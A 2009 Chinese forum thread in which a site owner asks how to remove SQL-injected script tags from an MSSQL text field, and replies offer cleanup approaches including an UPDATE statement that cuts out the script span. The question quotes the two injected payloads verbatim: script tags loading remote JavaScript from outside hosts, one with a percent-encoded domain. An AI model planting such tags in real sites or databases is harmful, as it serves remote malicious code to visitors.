VBscript语句求助

webhuman · 发表于 2009-3-31 18:12:53

一个MSSQL数据库，文本型字段被sql注入语句，语句为

<script src=http://3b3.org/c.js></script>
<Script Src=http://c.nuclear3%2E%63om/css/c.js></Script>
该语句被反复注入

复制代码

现在准备使用asp文件在线清除这些注入代码，问题是

1.如何判断表中字段是否存在注入语句
2.如何replace干净。

我的设想是

判断文本中是否存在"<scripe" or "</script>"

如果存在则如何替代？

如果不存在则该字段健康

假设表名为Table1，字段名为Name1，索引字段为id

judite · 发表于 2009-4-1 16:48:51

一定要用sql的正则么？
这个不会用那换种工具呗
比如perl；比如php；比如c

尚枫 · 发表于 2009-4-2 13:49:53

直接用存储过程吧，完全可以不用管SQL注入

blueblue · 发表于 2009-4-9 02:33:12

正则表达式可以的。

lsj · 发表于 2009-4-9 11:12:02

用个SQL语句应该就可以了
update Table1 set Name1=substring(Name1,1,charindex('<script', Name1)-1)
+substring(Name1,charindex('</script>', Name1)+9,len(Name1)-charindex('</script>', Name1)-8)
where patindex('%<script%</script>%', Name1) <> 0

		自动登录	找回密码
密码			立即注册

VBscript语句求助

评分

评分

评分